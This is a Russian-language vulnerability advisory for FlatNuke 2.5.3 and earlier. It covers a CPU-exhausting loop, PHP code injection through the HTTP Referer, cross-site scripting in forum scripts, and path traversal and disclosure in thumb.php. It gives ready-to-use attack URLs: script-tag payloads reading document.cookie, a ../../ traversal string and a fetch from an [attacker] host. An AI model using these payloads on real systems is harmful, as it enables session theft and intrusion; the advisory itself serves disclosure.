Программа: FlatNuke 2.5.3 и более ранние версии 

Уязвимости позволяют удаленному пользователю произвести XSS нападение и выполнить произвольный php сценарий на целевой системе. 

1. Удаленный пользователь может запросить сценарий ‘/flatnuke/foot_news.php’, что приведет к зацикливанию приложения и позволит злоумышленнику потребить все доступные ресурсы процессора. 

2. Удаленный пользователь может послать приложению специально сформированное поле HTTP Referer, содержащее php сценарий и выполнить его с привилегиями web сервера. Уязвимость существует в сценарии ‘flatnuke/misc/flatstat/referer.php’. 

Пример:

http://secwatch.org/exploits/2005/06/flatnuke_shell.php.info 

3. Межсайтовый скриптинг возможен из-за недостаточной проверки входных данных в параметрах ‘border’ и ‘back’ в сценариях ‘/forum/help.php’ и ‘/forum/footer.php’. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. 

Примеры:

http://[target]/forum/help.php?border=%22%3E%3C script%3Ealert(document.cookie)%3C/script%3E

http://[target]/forum/help.php?back=%22%3E%3C script%3Ealert(document.cookie)%3C/script%3E

http://[target]/forum/footer.php?back=%22%3E%3C script%3Ealert(document.cookie)%3C/script%3E

http://[target]/forum/footer.php? border=%22%3E%3 Cscript%3Ealert(document.cookie)%3C/script%3E 

4. Удаленный пользователь может просмотреть произвольные изображения на целевой системе и определить установочную директории приложения. 

Пример:

http://[target]/flatnuke/thumb.php?image= ../../non-webreadable/private/image.jpg

http://[target ]/flatnuke/thumb.php?image =http://[attacker]/image.jpg

http://[target]/flatnuke/thumb.php?image=null

http://[target]/flatnuke/index.php?mod= none_Search&find=1&where=null

http://[target]/flatnuke/print.php

http://[target]/flatnuke/thumb.php?image=null



Оставить мнение